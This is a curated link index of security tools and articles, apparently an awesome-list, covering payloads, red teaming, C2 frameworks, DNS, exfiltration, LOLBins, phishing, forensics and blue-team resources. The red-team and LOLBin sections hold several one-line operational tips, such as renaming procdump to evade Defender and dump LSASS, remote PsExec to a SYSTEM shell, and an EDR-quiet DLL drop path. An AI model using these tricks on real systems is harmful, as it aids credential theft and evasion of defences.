| dtd-finder | 610 | 9 months ago | : List DTDs and generate XXE payloads using those local DTDs |
| New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars! | |||
| XXE_payloads | |||
| Advanced XXE Exploitation | |||
| Planilhas Baby | , ssrf + ssti + xxe | ||
| ysoserial | 7,789 | 8 months ago | : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization |
| SerialVersionUID in Java | |||
| Java Serialization Magic Methods And Their Uses With Example | |||
| Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484) | , : java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse | ||
| CVE-2020-9484-Mass-Scan | 32 | over 4 years ago | |
| Exploiting JNDI Injections in Java | |||
| How to exploit Liferay CVE-2020-7961 : quick journey to PoC | |||
| How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM | |||
| Serialization: the big threat | |||
| marshalsec | 3,403 | almost 2 years ago | : Turning your data into code execution |
| SerializationDumper | 989 | 5 months ago | : A tool to dump Java serialization streams in a more human readable form |
| owaspsd-deserialize-my-shorts | 5 | over 8 years ago | : Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization" |
| Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities | |||
| Deserialization | |||
| FAR SIDES OF JAVA REMOTE PROTOCOLS | |||
| Serialization and deserialization in Java: explaining the Java deserialize vulnerability | |||
| Testing and exploiting Java Deserialization in 2021 | |||
| Queries and Mutations | |||
| GraphQL Injection | 61,485 | 4 days ago | |
| GraphQL | : Common vulnerabilities & how to exploit them. :  Represent any GraphQL API as an interactive graph | ||
| GraphQLmap | 1,390 | 9 months ago | : is a scripting engine to interact with a graphql endpoint for pentesting purposes |
CSIRT / Pentesting / Payloads / RPC: | |||
| Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries | |||
| ProtoFuzz | 272 | over 1 year ago | : Google Protocol Buffers message generator |
| pbtk - Reverse engineering Protobuf apps | 1,414 | about 1 month ago | : A toolset for reverse engineering and fuzzing Protobuf-based apps |
| Online Protobuf Decoder. | |||
CSIRT / Pentesting / Payloads | |||
| Burp Suite Cheat Sheet | |||
| Burp Suite Academy | |||
CSIRT / Pentesting / Payloads / REST Assured: Penetration Testing REST APIs Using Burp Suite: | |||
| Part 1 – Introduction & Configuration | |||
| Part 2 – Testing | |||
| Part 3 – Reporting | |||
CSIRT / Pentesting / Payloads | |||
| Awesome Burp Extensions | 3,001 | 5 days ago | : A curated list of amazingly awesome Burp Extensions |
| BurpSuiteHTTPSmuggler | 709 | over 5 years ago | : A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques |
| AutoRepeater | 846 | almost 3 years ago | : Automated HTTP Request Repeating With Burp Suite |
| privatecollaborator | 205 | 5 months ago | : A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate |
| Deploying a private Burp Collaborator server | |||
| Burp Collaborator Server docker container with LetsEncrypt certificate | 280 | 4 months ago | : This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server |
| SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT | : The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data | ||
| AES-Killer v3.0 | : Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly | ||
| Femida-xss | 277 | about 5 years ago | : Automated blind-xss search for Burp Suite |
| dotNetBeautifier | 12 | over 9 years ago | : A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE) |
| Java-Deserialization-Scanner | 775 | about 3 years ago | : All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities |
| JavaSerialKiller | 208 | 10 months ago | : Burp extension to perform Java Deserialization Attacks |
| BurpBounty | 1,680 | 7 months ago | : Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv |
| Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04 | |||
| BurpExtension-WhatsApp-Decryption-CheckPoint | 637 | about 5 years ago | |
| InQL | 1,540 | 5 months ago | : A Burp Extension for GraphQL Security Testing |
| param-miner | 1,245 | 9 days ago | |
| PII-Identifier | 21 | almost 4 years ago | : Burp Extension to identify PII data |
| 403Bypasser | 1,567 | over 1 year ago | : Burpsuite Extension to bypass 403 restricted directory |
| API testing with Swurg for Burp Suite | |||
| 403Bypasser | 1,567 | over 1 year ago | |
| create a Passive Profile for a param value, like testsqli and then create a Rule with this Profile to trigger SQLi active profile. | Burp Bounty | ||
| Handling Short Expiration Time of Authorization Tokens | |||
| BurpSuite-Team-Extension | 252 | about 2 years ago | : This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time. Requests that comes through your Burpsuite instance will be replicated in the history of the other testers and vice-versa! |
| ActiveScan++ | 208 | 12 months ago | : ActiveScan++ Burp Suite Plugin |
CSIRT / Pentesting / Red Team | |||
| Awesome Red Teaming | 6,917 | 11 months ago | |
| DumpsterFire | 997 | over 4 years ago | : "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts |
| Machine Learning for Red Teams, Part 1 | |||
| Flying under the radar | : Hack into a „highly protected“ company without getting caught | ||
| demiguise | 1,371 | about 2 years ago | : HTA encryption tool for RedTeams |
| Sn1per | 8,140 | about 1 month ago | : Automated pentest framework for offensive security experts |
| jenkins-shell | 94 | over 6 years ago | : Automating Jenkins Hacking using Shodan API |
| Red Team's SIEM | 2,383 | 2 months ago | : easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations |
| The-Hacker-Playbook-3-Translation | 2,289 | over 4 years ago | : 对 The Hacker Playbook 3 的翻译。 |
| How Do I Prepare to Join a Red Team? | |||
| Red Team & Physical Entry Gear | |||
| Gaining access on an external engagement through spear-phishing | Red Team Techniques: | ||
| Phantom Tap (PhanTap) | 582 | 6 months ago | : an ‘invisible’ network tap aimed at red teams |
| So You Want to Run a Red Team Operation | : I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization | ||
| Alternative C2 for Red Teamers | : . Koadic C3 COM Command & Control - JScript RAT | ||
| tunning tip | : if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder) | ||
| In-Memory-Only ELF Execution (Without tmpfs) | : In which we run a normal ELF binary on Linux without touching the filesystem (except /proc) | ||
| A Red Teamer's guide to pivoting | |||
| caldera | 5,668 | 1 day ago | : Automated Adversary Emulation |
| BankSecurity - Red_Team | 1,551 | almost 3 years ago | : Some scripts useful for red team activities |
| FIN6 Adversary Emulation | 1,726 | 11 months ago | |
| Red-Teaming-Toolkit | 9,116 | 3 months ago | : A collection of open source and commercial tools that aid in red team operations |
| RedFile | 18 | over 2 years ago | : A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads |
| Choose Your Own Red Team Adventure | |||
| Red Tip #415 | : STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account | ||
| Red Team Tactics: Hiding Windows Services | |||
| AQUARMOURY | : This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005 | ||
| Prelude Operator | : is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming | ||
| 0xsp Mongoose Red for Windows | 530 | over 2 years ago | : a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network |
| Macrome | 513 | almost 3 years ago | : Excel Macro Document Reader/Writer for Red Teamers & Analysts |
| FireEye Red Team Tool Countermeasures | 2,650 | 9 months ago | and |
| wifipumpkin3 | 1,982 | 11 months ago | : Powerful framework for rogue access point attack |
| The worst of the two worlds: Excel meets Outlook | |||
| redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness | 252 | 5 months ago | |
| pivoting cheat sheet | |||
| Self-hosting Your Red Team Payloads | : : Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV | ||
| Boomerang | 216 | almost 4 years ago | is a tool to expose multiple internal servers to web/cloud. Agent & Server are pretty stable and can be used in Red Team for Multiple levels of Pivoting and exposing multiple internal services to external/other networks |
| Mythic | 3,263 | 7 days ago | : A collaborative, multi-platform, red teaming framework |
| Alan Framework | 462 | 10 months ago | : A post-exploitation framework |
| Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams | |||
| Red Teaming/Adversary Simulation Toolkit | |||
| Wiki to collect Red Team infrastructure hardening resources | 4,154 | 8 months ago | |
| Red Team development and operations | : A PRACTICAL GUIDE TO RED TEAM OPERATIONS, WRITTEN BY: JOE VEST AND JAMES TUBBERVILLE | ||
| VECTR | 1,393 | 2 months ago | is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios |
| Mortar Loader | 1,413 | 11 months ago | : evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR) |
| RedTeam-Tools | 6,033 | over 1 year ago | : Tools and Techniques for Red Team / Penetration Testing |
| Cobalt Strike | : is software for Adversary Simulations and Red Team Operations. 4.2 | ||
| CrossC2 | 2,283 | about 1 year ago | : generate CobaltStrike's cross-platform payload |
| Cobalt-Strike-CheatSheet | 986 | almost 3 years ago | : Some notes and examples for cobalt strike's functionality |
| Introducing | |||
| Octopus | 730 | over 3 years ago | : Open source pre-operation C2 server based on python and powershell |
| Covenant | 4,197 | 4 months ago | : Covenant is a collaborative .NET C2 framework for red teamers |
| Building C2 Implants in C++: A Primer | |||
| tc2 | 26 | almost 4 years ago | : treafik fronted c2 examples |
| ToRat | 977 | over 1 year ago | : is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication |
| Python Backdoor Talking to a C2 Through Ngrok | |||
| Silver | 8,536 | 11 days ago | : Implant framework |
| PoshC2 | 1,820 | about 1 month ago | : is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement |
| pyMalleableC2 | 267 | 24 days ago | : Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically |
| link | 563 | over 3 years ago | : is a command and control framework written in rust |
| Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1 | |||
| THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY. | |||
| Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2 | |||
| melting-cobalt | 164 | about 2 years ago | : A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object |
| 面向iOS攻击的beacon生成 | : command & control on iOS | ||
CSIRT / Pentesting / Purple Team | |||
| Purple Cloud | 525 | 10 days ago | : An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On |
| PRO TIP when looking through logs on Windows. Use WEVTUTIL.exe | |||
CSIRT / DNS | |||
| dnstwist | 4,912 | about 2 months ago | |
| Plight At The End Of The Tunnel | |||
| dref | 481 | over 3 years ago | : DNS Rebinding Exploitation Framework |
| dns-rebind-toolkit | 485 | about 3 years ago | : A front-end JavaScript toolkit for creating DNS rebinding attacks |
| Bypass firewalls by abusing DNS history | 1,197 | about 2 years ago | : Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters |
| dnstwist | 4,912 | about 2 months ago | : Domain name permutation engine for detecting typo squatting, phishing and corporate espionage |
| Can I take over XYZ? | 4,867 | 7 days ago | : a list of services and how to claim (sub)domains with dangling DNS records |
| SubR3con | 18 | over 5 years ago | : is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go |
| TakeOver-v1 | 101 | over 1 year ago | : script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability |
| subzy | 1,063 | 2 months ago | : Subdomain takeover vulnerability checker |
| Subdomain Takeover Scanner | 57 | over 1 year ago | |
| subdomain-takeover | 353 | over 1 year ago | : SubDomain TakeOver Scanner by 0x94 |
| DNSCrypt | is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. , and | ||
| pdns-qof | 36 | 3 months ago | : Passive DNS Common Output Format |
| dnsdbq | 94 | 14 days ago | : DNSDB API Client, C Version |
CSIRT / DNS / DNS Logging: | |||
| How to enable bind query logging to find out Who’s Querying a Name Server | |||
| BIND Logging - some basic recommendations | |||
| BIND 9 logging best practices | |||
| BIND9 Configuration Guide | |||
| Thwarting and detecting malware with RPZ and OSSEC | |||
| The Importance of DNS Logging in Enterprise Security | |||
CSIRT / DNS | |||
| DNSObserver | 188 | about 4 years ago | : A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack |
| Unbound DNS Blacklist | |||
| subjack | 1,911 | over 1 year ago | : Subdomain Takeover tool written in Go |
| sad dns | : The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq) | ||
| dog | 6,179 | 6 months ago | : Command-line DNS client |
| NtHiM | 355 | over 1 year ago | : Now, the Host is Mine! - Super Fast Sub-domain Takeover Detection! |
| Passive DNS - Common Output Format | 36 | 3 months ago | |
| DNS loophole makes nation-state level spying as easy as registering a domain | |||
CSIRT / Exfiltration | |||
| Script for searching the extracted firmware file system for goodies! | 1,057 | about 1 year ago | |
| DKMC - Dont kill my cat | 1,377 | over 4 years ago | : Malicious payload evasion tool |
| Tunna | 1,241 | about 2 years ago | is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments |
| gitleaks | 17,964 | 17 days ago | : Searches full repo history for secrets and keys |
| Twitter Scraper | 3,936 | about 1 year ago | |
| tinfoleak | ( ):The most complete open-source tool for Twitter intelligence analysis | ||
| Social IDs | 12 | almost 8 years ago | : Get user ids from social network handlers |
| SpookFlare | 946 | over 5 years ago | : Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures |
| Photon | 11,067 | 3 months ago | : Incredibly fast crawler which extracts urls, emails, files, website accounts and much more |
| Extracting data from an EMV (Chip-And-Pin) Card with NFC technology | |||
| accountanalysis | : This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often | ||
| How to get authentication key from SNMPv3 packets | |||
| AtomicTestsCommandLines.txt | : Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon | ||
| whois | GTFOBins | : hangs waiting for the remote peer to close the socket. , GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems | ||
| ssh-keygen can be used to load shared libraries | |||
| Browsers affected by the History API DoS | |||
| PacketWhisper | : Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography. : Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server | ||
| Using Google Analytics for data extraction | |||
| Exfiltrating credentials via PAM backdoors & DNS requests | |||
| Building simple DNS endpoints for exfiltration or C&C | |||
| CheckPlease | 898 | over 3 years ago | : Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust |
| okhttp-peer-certificate-extractor | 79 | over 8 years ago | : This tool extracts peer certificates from given certificates |
| DET | 820 | about 7 years ago | : (extensible) Data Exfiltration Toolkit (DET) |
| awesome-python-login-model | 15,938 | over 2 years ago | : login access for webscrapping |
| Hamburglar | 316 | almost 2 years ago | : collect useful information from urls, directories, and files |
| Giggity | 126 | over 1 year ago | : grab hierarchical data about a github organization, user, or repo |
| Living Off The Land Binaries and Scripts (and also Libraries) | - | ||
| Windows TCPIP Finger Command | : C2 Channel and Bypassing Security Software | ||
| Living Off Windows Land – A New Native File “downldr” | |||
| Ttdinject.exe | : Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe) | ||
| Exfiltrate Like a Pro | : Using DNS over HTTPS as a C2 Channel | ||
| Awesome Asset Discovery | 1,990 | 6 months ago | : List of Awesome Asset Discovery Resources |
| Cloakify-Factory: | : A Data Exfiltration Tool Uses Text-Based Steganography. : Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection | ||
| hakrawler | 4,502 | 10 months ago | : Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application |
| Chameleon | 459 | about 2 years ago | : A tool for evading Proxy categorisation |
| DNSExfiltrator | 847 | 7 months ago | : Data exfiltration over DNS request covert channel |
| Data Exfiltration using Linux Binaries | |||
| Exploring the WDAC Microsoft Recommended Block Rules: kill.exe | . lolbin/lolbas | ||
| Desperate downloader | MSOXMLED.EXE - | ||
CSIRT / Exfiltration / LOLBIN/LOLBAS: | |||
| Exploring the WDAC Microsoft Recommended Block Rules: kill.exe | . lolbin/lolbas | ||
| I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= | lolbin/lolbas | ||
| C:\Windows\System32\Cmdl32.exe | |||
| I shot the sigverif.exe – the GUI-based LOLBin | |||
| \http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe | |||
| Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus? | |||
| C:\Windows\System32\WorkFolders.exe | |||
| C:\Windows\System32\certoc.exe -LoadDLL | |||
| if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio*" folder, you can bypass Defender and dump LSASS. | |||
CSIRT / Exfiltration | |||
| Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service | |||
| Living off the land | |||
| It's not a forgotten legacy code, it's recidivism | : tpmtool drivetracing | ||
| Python Keylogger Using Mailtrap.io | |||
CSIRT / Exfiltration / Steganography | |||
| A list of useful tools and resources | |||
| steghide | 593 | 9 months ago | : is a steganography program that is able to hide data in various kinds of image- and audio-files |
| stegsolve | 650 | over 3 years ago | |
| Unicode Text Steganography Encoders/Decoders | |||
| StegCracker | 554 | almost 4 years ago | : Steganography brute-force utility to uncover hidden data inside files |
| Simple Image Steganography in Python | |||
| How To Hide Data in Images Using Python | |||
| Aperi'Solve | is an online platform which performs layer analysis on image. The platform also uses zsteg, steghide, outguess, exiftool, binwalk, foremost and strings for deeper steganography analysis | ||
| Stegseek | 1,034 | about 1 year ago | : Worlds fastest steghide cracker, chewing through millions of passwords per second |
CSIRT / Phishing | |||
| Phishing on Twitter | 251 | over 6 years ago | |
| evilginx2 | 10,924 | 3 months ago | : Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication |
| shellphish | : Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest | ||
| pompa | 49 | 11 months ago | : Fully-featured spear-phishing toolkit - web front-end |
| ..Modlishka.. | 4,847 | 7 months ago | : Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side) |
| Using phishing tools against the phishers | — and uncovering a massive Binance phishing campaign | ||
| Lure | 158 | over 1 year ago | : User Recon Automation for GoPhish |
| PhishingKitTracker | : An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats | ||
| SimplyTemplate | 162 | almost 7 years ago | : Phishing Template Generation Made Easy |
| Compromising operating systems through fake software updates | . Using: is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates | ||
| MurmurHash | 114 | about 1 year ago | : This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform |
| SniperPhish | 540 | 7 months ago | : The Web-Email Spear Phishing Toolkit |
| King Phisher | 2,269 | 4 months ago | : Phishing Campaign Toolkit |
| phishing-frenzy | 794 | about 1 year ago | : Ruby on Rails Phishing Framework |
| gophish | 11,675 | 2 months ago | : |
| Phishing 101: why depend on one suspicious message subject when you can use many? | |||
| Widespread credential phishing campaign abuses open redirector links | |||
| ThePhish | 1,154 | 4 months ago | : an automated phishing email analysis tool |
CSIRT / Forensics | |||
| Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way! | |||
| O-Saft | 373 | 5 days ago | : OWASP SSL advanced forensic tool |
| PcapXray | 1,698 | over 2 years ago | A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction |
| swap_digger | 513 | over 3 years ago | is a tool used to automate Linux swap analysis during post-exploitation or forensics |
| The Sleuth Kit® (TSK) | 2,630 | 7 days ago | is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data |
| Invoke-LiveResponse | 145 | almost 3 years ago | |
| Linux Forensics | |||
| CDQR | 334 | over 2 years ago | : The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices |
| mac_apt | 781 | about 1 month ago | : macOS Artifact Parsing Tool |
| MacForensics | 179 | 4 months ago | : Repository of scripts for processing various artifacts from macOS (formerly OSX) |
| imago-forensics | 249 | almost 3 years ago | : Imago is a python tool that extract digital evidences from images |
| remedi-infrastructure | 4 | almost 6 years ago | : setup and deployment code for setting up a REMEDI machine translation cluster |
| Tsurugi Linux | is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand | ||
| libelfmaster | 410 | 17 days ago | : Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools |
| usbrip | 1,154 | about 2 years ago | (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines |
| Digital Forensics and Incident Response | : This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response | ||
| KAPE | Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. . and | ||
| AVML | 875 | 10 days ago | (Acquire Volatile Memory for Linux) |
| turbinia | 750 | 7 days ago | : Automation and Scaling of Digital Forensics Tools |
| Eric Zimmerman's Tools | |||
| MacQuisition | : A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging | ||
| Kuiper | 769 | about 1 month ago | : Digital Forensics Investigation Platform |
| file Signatures | : | ||
| PowerForensics | 1,385 | about 1 year ago | : PowerForensics provides an all in one platform for live disk forensic analysis |
| OfficeForensicTools | 26 | over 4 years ago | : A set of tools for collecting forensic information |
| FBI Electronic Tip For | |||
| CHIRP | 1,043 | over 3 years ago | : A forensic collection tool written in Python |
| Hash Cracking with AWS and hashcat | |||
| Hashcat new feature: autodetect hash-mode | |||
| L0phtCrack | is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables | ||
| Foremost | 317 | over 1 year ago | : is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you |
| TrID | : is an utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way | ||
| image-unshredding | 607 | about 8 years ago | : Image unshredding using a TSP solver |
| Linux Incident Response Guide | |||
| FastIR Artifacts | 160 | 5 months ago | : Live forensic artifacts collector |
| MVT | 10,416 | 22 days ago | (Mobile Verification Toolkit) helps conducting forensics of mobile devices in order to find signs of a potential compromise |
| Cloud Forensics Triage Framework (CFTF) | |||
| Forensic Investigation | Cisco Stealthwatch at work | ||
| Andriller CE (Community Edition) | 1,343 | over 2 years ago | : is software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices |
| Dshell | 5,454 | 7 months ago | is a network forensic analysis framework |
| exif-gps-tracer | 41 | almost 4 years ago | : A python script which allows you to parse GeoLocation data from your Image files stored in a dataset.It also produces output in CSV file and also in HTML Google Maps |
CSIRT / Forensics / Anti-Forensics: | |||
| ShredOS x86_64 - Disk Eraser | 1,506 | 2 months ago | : for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe |
CSIRT / Forensics | |||
| dfir_ntfs | 191 | 15 days ago | : An NTFS/FAT parser for digital forensics & incident response |
| MemProcFS | 3,115 | 7 days ago | : is an easy and convenient way of viewing physical memory as files in a virtual file system |
| LeechCore | 522 | about 1 month ago | : Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent |
| PCILeech | 5,011 | 12 days ago | : Direct Memory Access (DMA) Attack Software |
CSIRT / Forensics / PDF | |||
| PDF Tools | |||
| peepdf | 1,309 | 3 months ago | : Powerful Python tool to analyze PDF documents |
| How to Protect Files With Canary Tokens | |||
| Attacks on PDF Certification | |||
| How to remove malicious code from PDF files | |||
| mu tools | |||
| PDF forensics with Kali Linux : pdfid and pdfparser | |||
| How can I extract a JavaScript from a PDF file with a command line tool? | |||
| Insecure Features in PDFs. | |||
| Shadow Attacks … the smallest attack vector ever | |||
CSIRT / Forensics / Email Headers | |||
| Configuring MTA-STS and TLS Reporting For Your Domain | |||
| Google Admin Toolbox | |||
| Azure Message Header Analyzer | |||
CSIRT / Forensics / Distros | |||
| CAINE | : Computer Aided INvestigative Environment. Is an Italian GNU/Linux live distribution created as a Digital Forensics project | ||
| e-Fense Helix 3 | |||
| black arch | : An ArchLinux based distribution for penetration testers and security researchers | ||
| List of Live Distributions for Computer Forensics | |||
CSIRT / Forensics / Volatility | |||
| volatility | 7,343 | over 1 year ago | : An advanced memory forensics framework |
| Volatility profiles for Linux and Mac OS X | 318 | about 2 years ago | |
| Building a profile for Volatility | |||
| OROCHI | 225 | 7 days ago | : The Volatility Collaborative GUI |
| AutoVolatility | 108 | about 2 years ago | : Run several volatility plugins at the same time |
| Memory Forensics and Analysis Using Volatility | |||
| Volatility, my own cheatsheet (Part 1): Image Identification | |||
| First steps to volatile memory analysis | |||
| MemLabs | 1,659 | over 3 years ago | : Educational, CTF-styled labs for individuals interested in Memory Forensics |
CSIRT / Blue Team / MITRE ATT&CK: | |||
| ATTACK-Tools | 1,012 | 6 months ago | : Utilities for MITRE™ ATT&CK |
| Analisando ameaças com Mitre ATT&CK Navigator | (pt-br) | ||
| ATT&CK™ Navigator | : Web app that provides basic navigation and annotation of ATT&CK matrices | ||
| Atomic Threat Coverage | 972 | over 2 years ago | : Actionable analytics designed to combat threats based on MITRE's ATT&CK |
| atomic-red-team | 9,811 | 1 day ago | : Small and highly portable detection tests based on MITRE's ATT&CK |
| Welcome to Stealthbits Attack Catalog | : Adversary techniques for credential theft and data compromise | ||
| Splunk Attack Range | 2,162 | 16 days ago | : A tool that allows you to create vulnerable instrumented local or cloud environments to simulate attacks against and collect the data into Splunk |
| attack-scripts | 581 | 12 months ago | : Scripts and a (future) library to improve users' interactions with the ATT&CK content |
| Windows-specific MITRE ATT&CK techniques application control prevention assessment. | This is a first attempt to assess the extent to which application control solutions would mitigate/prevent attack techniques. Note: this highly subjective assessment assumes a system that enforces an application control solution that at a minimum allows all Windows-signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications | ||
| Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9? | |||
| EU MITRE ATT&CK® Community | |||
| Mitre Att&ck Matri | 18 | over 3 years ago | |
| Best Practices for MITRE ATT&CK® Mapping | |||
CSIRT / Blue Team | |||
| MITRE D3FEND | |||
| DeTTECT | 2,066 | 15 days ago | : Detect Tactics, Techniques & Combat Threats |
CSIRT / Blue Team / Sysmon: | |||
| Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were | |||
| Sysmon 12.0 — EventID 24 | : is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring | ||
| SysmonX | 210 | about 5 years ago | : An Augmented Drop-In Replacement of Sysmon |
| SysmonSimulator | 833 | almost 3 years ago | : Sysmon event simulation utility which can be used to simulate the attacks to generate the Sysmon Event logs for testing the EDR detections and correlation rules by Blue teams |
CSIRT / Blue Team | |||
| Awesome Honeypots | 8,661 | 3 months ago | : A curated list of awesome honeypots, plus related components and much more, divided into categories such as Web, services, and others, with a focus on free and open source projects |
| T-Pot | 6,855 | 8 days ago | : The All In One Honeypot Platform  |
| Blue Team Fundamentals | |||
| Blue Team fundamentals Part Two | : Windows Processes | ||
| Sooty | 1,352 | about 2 months ago | : The SOC Analysts all-in-one CLI tool to automate and speed up workflow |
| Your detections aren't working | |||
| elastalert | 8,000 | 4 months ago | : Easy & Flexible Alerting With ElasticSearch |
| Technical Approaches to Uncovering and Remediating Malicious Activity | : Alert (AA20-245A) | ||
